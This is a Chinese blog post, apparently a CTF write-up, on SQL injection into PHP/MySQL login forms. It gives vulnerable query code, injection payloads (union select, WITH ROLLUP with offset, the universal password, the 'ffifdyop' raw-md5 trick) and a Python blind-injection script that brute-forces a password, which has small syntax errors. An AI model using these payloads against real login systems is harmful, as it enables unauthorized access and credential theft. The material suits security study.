mysql 登录框注入_登陆界面的SQL注入

最新推荐文章于 2024-03-29 19:39:56 发布
最新推荐文章于 2024-03-29 19:39:56 发布
阅读量2.6k 收藏 1
点赞数
文章标签: mysql 登录框注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42245967/article/details/114336293
版权

首先登陆的sql通常分为两种类型1

2

3

4

5

6

7(1)先匹配username(注册时也类似这种方法验重)

$query = mysql_query("SELECT * FROM interest WHERE uname = '{$_POST['uname']}");

$key = mysql_fetch_array($query);

if($key['pwd'] == $_POST['pwd']) {...

(2)用户名密码同时认证

SELECT * FROM admin WHERE username = 'admin' and password = '".md5($password,true)."'";

第一类型

一般两种想法注入

注出username或password

绕过

控制password实验吧–因缺思汀的绕过1

2

3

4

5

6

7

8

9

10

11

12

13mysql_select_db($db, $con);

$sql="SELECT * FROM interest WHERE uname = '{$_POST['uname']}'";

$query = mysql_query($sql);

if (mysql_num_rows($query) == 1) {

$key = mysql_fetch_array($query);

if($key['pwd'] == $_POST['pwd']) {

print "CTF{XXXXXX}";

}else{

print "亦可赛艇!";

}

}else{

print "一颗赛艇!";

}

绕过

控制$query中pwd的返回值

union select

要先知道字段数1

2

3

4

5

6mysql> select * from users where username='xxx' union select 1,2,3;

+----+----------+----------+

| id | username | password |

+----+----------+----------+

| 1 | 2 | 3 |

+----+----------+----------+

Payload1?uname=xxx' union select 1,1,1#&pwd=1

变形

过滤了逗号

我们假设Boris用户不存在1

2

3

4

5

6mysql> select user_id,user,password from users where user='Boris' union select * from((select 1)a join (select 2)b join (select 3)c);

+---------+------+----------+

| user_id | user | password |

+---------+------+----------+

| 1 | 2 | 3 |

+---------+------+----------+

with rollup

使$key[‘pwd’]返回NULL1

2

3

4

5

6

7mysql> select user_id,user,password from users where user='admin' group by password with rollup;

+---------+-------+----------------------------------+

| user_id | user | password |

+---------+-------+----------------------------------+

| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |

| 1 | admin | NULL |

+---------+-------+----------------------------------

那mysql_num_rows($query) == 1这个判断怎办?

​ 用offset 绕过就行

Payload1uname=ad' or 1 group by pwd with rollup limit 1 offset 2#&pwd=

注入

登陆报错能区分用户名错误还是密码错误

like/regexp 通配符%

注入admin用户应存在,不然返回empty set

like 和%1uname=ad' or pwd like 's%' limit 1#&pwd=ss

exp1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23# -*- coding:utf-8 -*-

import urllib

import requests

import string

def (i):

url = "http://ctf5.shiyanbar.com/web/pcat/index.php"

test_data = {'uname':'af' or pwd like ''+i+'%' limit 1#', 'pwd':'sad'}

headers = {'Origin': 'http://ctf5.shiyanbar.com', 'Content-Type': 'application/x-www-form-urlencoded'}

res = requests.post(url, data = urllib.parse.urlencode(test_data), headers=headers)

if(res.content.decode('UTF-8') == "亦可赛艇!"):

return True

return False

if __name__ == '__main__':

pwd = ''

for i in range(11):

for x in string.ascii_letters+string.digits+'@':

if(exp(pwd+x)):

pwd = pwd+x

print(pwd)

break

print(pwd)

即可得到密码:sfl23kl123@

然后提交:1uname=ad' or pwd like '%' limit 1#&pwd=sfl23kl123@

变形md5($_POST[‘pwd’])

union注入:1username=xxx' or 1 union select 1,1,md5(1)#&pwd=1

如基于上述条件且判断为1mysql_num_rows($query) >0

输入不存在的用户名,$key[‘pwd’]是NULL

pwd传数组则md5函数返回也是NULL

第二类型

这种情况下过滤了引号在addslashes直接注入一般就没办法了实验吧–后台登陆1

2

3

4

5

6

7

8

9$sql = "SELECT * FROM admin WHERE username = 'admin' and password = '".md5($password,true)."'";

$result=mysqli_query($link,$sql);

if(mysqli_num_rows($result)>0){

echo 'flag is :'.$flag;

}

else{

echo '密码错误!';

}

万能密码

参考文末第二个链接

下面来看一种

username=’=’&password=’=’1user where username='''='' and password=''=''

username=’’返回值为0,相当于false,然后0=”的结果为1,相当于true。

example: 实验吧: 万能密码 — not than easy

md5注入

某内容hash后正好,是一些可注入的代码的hex值,下面适量个链接一里提到的

payload: 129581926211651571912466741651878684928

hex: 06da5430449f8f6f23dfc1276f722738

raw: ?T0D??o#??’or’8.N=?

payload: ffifdyop

hex: 276f722736c95d99e921722cf9ed621c

raw: ‘or’6蒥欓!r,b

以ffifdyop为例,它md5后,会成为276f722736c95d99e921722cf9ed621c

mysql自动十六进制转成字符串:’or’6那整个sql变成1username = 'admin' and password = ''or'6'`

example:JarvisOJ Login

Links:

体制老司机
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
javaweb 登陆界面 servlet+sql
05-04
javaweb 结合了servlet mysql Java Web,是用Java技术来解决相关web互联网领域的技术总和。web包括:web服务器和web客户端两部分。Java在客户端的应用有java applet,不过使用得很少,Java在服务器端的应用非常的...
乘风多用户计数器 v3.94 (Sql).rar
07-06
14.安全性:密码MD5加密,注册、登陆使用验证码,完全防Sql注入 2009-3-9 乘风多用户计数器 V3.93版本推出,加入功能:全新的界面,可以自己定义皮肤颜色,加入留言板样式的统计,加入非脚本图片限制最大上传大小的...
mysql 登录注入_sqlmap之(六)----POST登陆注入实战
weixin_30698775的博客
01-19 642
利用sqlmap进行POST注入,常见的有三种方法:注入方式一:1.用Burp抓包,然后保存抓取到的内容。例如:保存为post.txt,然后把它放至某个目录下2.列数据库:sqlmap.py-r"c:\Users\fendo\Desktop\post.txt"-pn--dbs注:-r表示加载一个文件,-p指定参数其中出现了三次提示:it looks like the back-end D...
sql注入实战
qq_64875725的博客
04-17 101
sql注入的原理是吧用户输入的数据都当做代码来执行,最终达到将欺骗服务器的恶意指令输入数据库中。首先,寻找注入点,常见的注入点用户的登陆界面,搜索框等。id = 1' and '1' = '2 返回失败。id = 1' and '1' ='1 返回成功。id = 100 and 1=1 返回正常。id = 100 and 1=1 返回成功。id = 100 and 1=2 返回失败。ID=100’ 返回错误说明可能存在注入。id =100 and 1=2 返回错误。满足以上三点,说明存在注入点。
sql注入笔记
最新发布
2301_81290872的博客
03-29 582
在初步尝试登录成功后,接下来还是按照sql注入的步骤进行。我们注入1' union select 1, 2, 3 #,发现Hello处显示了2,Your password is处显示了3,再经过其它测试发现查询的字段数只有3列。可以猜到第2列对应的是用户名,第3列对应的是密码。在与服务器数据库进行数据交互的地方拼接了恶意的sql代码,达到欺骗服务器执行恶意代码的目的。根据上步骤可以猜测flag存在表l0ve1ysq1中,下面就应该获取字段信息。回显了一个奇怪的字符串,看起来很像flag,但不是。
用户登录页面--SQL注入
李书明(石家庄)的专栏
01-23 1万+
web网站攻击方式多种多样,sql注入是经常使用的攻击方向。攻击者把SQL命令插入到Web表单的输入域或页面请求的字符串,欺骗服务器执行恶意的SQL命令 SQL注入不是Web或数据库服务器中的缺陷,而是由于编程实践较差且缺乏经验而导致的。 动态拼接的SQL指令最易受攻击。 如登录时使用的SQL指令: $query = 'SELECT * from Users WHERE login = ' ...
登录页面的SQL注入漏洞
m0_61974571的博客
10-12 3703
1、在Linux准备一套Xampp或者Phpstudy:模拟攻防2、在vscode安装Rremote Development插件,进行远程调试新添加主机 在opt/lampp/security创建项目 login.php welcome.php 二、进行登陆的渗透测试 注入类攻击的核心点: (1)、拼接为有效的代码或语句(2)、确保完成了闭合,并且可以改变原有执行逻辑通常并非处理一下就可以完成拼接和闭合,需要不停的尝试,知道出现不一样的结果。这个尝试过程建议使用python+字典快速处理上述代码一共存
HTB_Appointment 靶机之登录框万能密码、sqlmap post 注入
网络安全学习
04-22 3736
⚔ 🧱 YOU NEED TO WALK BEFORE YOU CAN RUN 🧱⚔ 文章目录先放答案万能密码注入sqlmap post 注入测试是否存在注入查数据库查表查列查数据 先放答案 因为这期问题都比较简单,简单到我想不到讲什么把它们串到一起,索性就直接放答案了 Structured Query Language SQL Injection personally identifiable information A03:2021-Injection Apache httpd 2.4.38 ((.
基于J2EE框架的个人博客系统项目毕业设计论...
05-10
 4.SQL Server与Windows NT完全集成,利用了NT的许多功能,如发送和接受消息,管理登录安全性等。SQL Server也可以很好地与Microsoft BackOffice产品集成。  5.具有很好的伸缩性,可跨越从运行Windows 95/98的...
基于J2EE框架的个人博客系统项目毕业设计论文(源码和论文)
03-12
 4.SQL Server与Windows NT完全集成,利用了NT的许多功能,如发送和接受消息,管理登录安全性等。SQL Server也可以很好地与Microsoft BackOffice产品集成。  5.具有很好的伸缩性,可跨越从运行Windows 95/98的...
入门渗透:SQL注入登录页面——Appointment
栉风沐雪的博客
02-16 610
它是最受欢迎的HTTP服务器之一,通常在标准HTTP端口上运行,例如端口 80 TCP、443 TCP 以及 HTTP 端口(如 8080 TCP 或 8000 TCP)上的端口。发现80端口http服务开启,Apache版本为2.4.38,通过搜索引擎查看该版本的漏洞,发现不含任何已知的可以利用的漏洞。/home /login /contact /login/forgot 均无所发现,尝试使用gobuster工具。#在其中表示注释语句,那么尝试利用用户名一栏注释掉密码需求,实现只用用户名就可以登入,
DC-1 登录框的sql注入
a_153161的博客
12-04 1100
DC-1登录框的报错注入
利用SQL注入漏洞登录后台
zxcvbnmasdflzl的博客
06-19 1万+
所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令
一个简单的登录框实现和预防sql注入
weixin_47391907的博客
10-28 108
添加了addcslashes()函数过滤的情况,用以下playload:原理是目标系统利用“”号来拼接输入变量,但是“”号可以解析$str这个变量。如图:目标源码使用addcslashes()函数过滤$_str ,再用“”号闭合赋值给$str,最终再传入eval()函数。对比可以看到:只要是’‘ 或者“”包裹的正常php代码,无论添加多少层{ }号闭合php代码语句,都可以顺利执行。注:这段php测试代码说明了利用addcslashes()去过滤eval()函数的输入,可以利用${}来进行绕过。
sql注入一般流程(附例题)
热门推荐
Battery的博客
08-03 8万+
在与服务器数据库进行数据交互的地方拼接了恶意的sql代码,达到欺骗服务器执行恶意代码的目的。本质上是程序把用户输入的数据当成了sql语句执行。
sql注入思路(登录界面)和网络常用端口
u011975363的专栏
04-11 7205
当遇到如图的界面时,没有验证码,我们可以尝试以下几种方法进行SQL注入,以获得正确的登录账户和密码。 要搜索类似的页面可利用百度高级搜索语法:admin inurl:login.php/asp 注入的方法: 1、利用sqlmap (1)sqlmap 和burpsuite相结合,利用burpsuite捕获post数据包,保存为:packet.txt, 从用户名或者密码中任选一个...
三种后台登入框注入
eldn__的专栏
04-18 8165
http://www.2cto.com/Article/201111/110527.html 以下是小菜新得 各位看管莫笑 老牛 飘过------ 废话不多说 开始 第一种注入 后台dbo 权限拿websehll 目标网站:http://bhst.edu.cn/manage/login.aspx 判断有无注入 输入” a’” 返回错误页面— 爆字
登录注入笔记
weixin_34233421的博客
11-28 363
2019独角兽企业重金招聘Python工程师标准>>> ...
html登陆注册界面的数据如何链接mysql
03-08
可以使用 PHP 来连接 MySQL 数据库,通过 PHP 的 mysqli 函数库来实现。具体步骤如下: 1. 在 HTML 登录注册界面中,设置表单的 action 属性为 PHP 文件的路径,例如 action="login.php"。 2. 在 PHP 文件中,使用 mysqli_connect 函数连接 MySQL 数据库,例如 $conn = mysqli_connect("localhost", "username", "password", "database")。 3. 在 PHP 文件中,使用 mysqli_query 函数执行 SQL 语句,例如 $result = mysqli_query($conn, "SELECT * FROM users WHERE username='$username' AND password='$password'")。 4. 在 PHP 文件中,使用 mysqli_fetch_assoc 函数获取查询结果,例如 $row = mysqli_fetch_assoc($result)。 5. 根据查询结果,判断用户输入的用户名和密码是否正确,如果正确则跳转到登录成功页面,否则提示用户重新输入。 注意:在连接 MySQL 数据库时,需要替换用户名、密码和数据库名称为实际的值。同时,为了防止 SQL 注入攻击,需要对用户输入的数据进行过滤和转义。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值